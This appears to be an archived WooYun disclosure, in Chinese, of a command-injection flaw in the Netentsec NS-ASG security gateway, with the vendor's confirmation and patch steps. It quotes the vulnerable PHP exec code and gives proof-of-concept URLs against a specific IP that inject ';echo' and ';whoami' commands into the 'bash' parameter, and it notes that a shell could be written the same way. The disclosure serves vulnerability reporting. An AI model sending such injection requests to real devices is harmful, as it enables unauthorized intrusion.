linda

漏洞概要
缺陷编号：        WooYun-2014-58925
漏洞标题：        网康 NS-ASG 应用安全网关所有版本任意命令执行可getshell
相关厂商：        网康科技
漏洞作者：        倪明
提交时间：        2014-04-30 11:52
修复时间：        2014-07-29 11:54
公开时间：        2014-07-29 11:54
漏洞类型：        设计不当
危害等级：        高
自评Rank：        20
漏洞状态：        厂商已经修复
漏洞来源：        http://www.wooyun.org
Tags标签：       设计不当 硬件安全

漏洞详情披露状态：
2014-04-30：        细节已通知厂商并且等待厂商处理中
2014-05-01：        厂商已经确认，细节仅向厂商公开
2014-05-11：        细节向核心白帽子及相关领域专家公开
2014-05-21：        细节向普通白帽子公开
2014-06-10：        细节向实习白帽子公开
2014-07-29：        厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：网康 NS-ASG 应用安全网关所有版本任意命令执行可getshell
so easy。。。
详细说明：
code 区域case "restartservice":
        $command = "sudo /etc/init.d/".$bash." stop";
        exec($command);
        $command = "sudo /etc/init.d/".$bash." start";
        exec($command);
        redirect("list_logfile.php");
        break;

好逗，用“;”号隔开，直接可以执行任意命令 (￣◇￣;)


code 区域https://202.113.20.208/debug/list_logfile.php?action=restartservice&bash=;echo test >/Isc/third-party/httpd/htdocs/test.txt;
漏洞证明：



同样，写shell也可以

执行系统命令可以写入文件来看返回结果


code 区域https://202.113.20.208/debug/list_logfile.php?action=restartservice&bash=;whoami >>/Isc/third-party/httpd/htdocs/test1.txt;




修复方案：
版权声明：转载请注明来源 倪明@乌云
漏洞回应
厂商回应：
危害等级：高
漏洞Rank：10
确认时间：2014-05-01 22:03
厂商回复：4月29日，网康收到CNVD漏洞细节通知，迅速启动并同时展开了以下工作：
1.进一步验证漏洞细节，目前已确认所曝漏洞确实存在于ASG产品；
2.对全线产品进行安全自查，重点确认ASG产品是否仍存其它未知漏洞，并验证类似漏洞是否同存于其它产品线，截至目前，自查工作仍在进行中，全线产品暂未发现新的漏洞；
3.开发用于漏洞修补的更新程序，将尽快发布应急补丁包，介时用户可通过操作设备管理界面直接安装该更新程序以对所曝漏洞进行应急性修补；
4.售后服务部通过内部CRM系统导出全部ASG用户名单，并开始逐一联系用户通报漏洞情况，补丁包发布后，将再次逐一通知所有用户及时安装更新，此项工作预计3工作日内完成；
5.为避免统计疏漏，工程部于4月30日16:00向CNVD共享了在线ASG设备的辨识方法，将配合CNVD共同开展在线设备的主动探测工作，一旦发现未更新补丁的在线设备，将联系并协助用户及时更新，此项工作预计10工作日内完成；
6.将尽快向社会开放漏洞提交邮箱，接受第三方机构、白帽子及其它组织、个人向网康提交产品漏洞，向所有帮助网康产品进步的组织和人士表示感谢。
最新状态：2014-07-17：已通过补丁解决

原文：http://www.wooyun.org/bugs/wooyun-2014-058925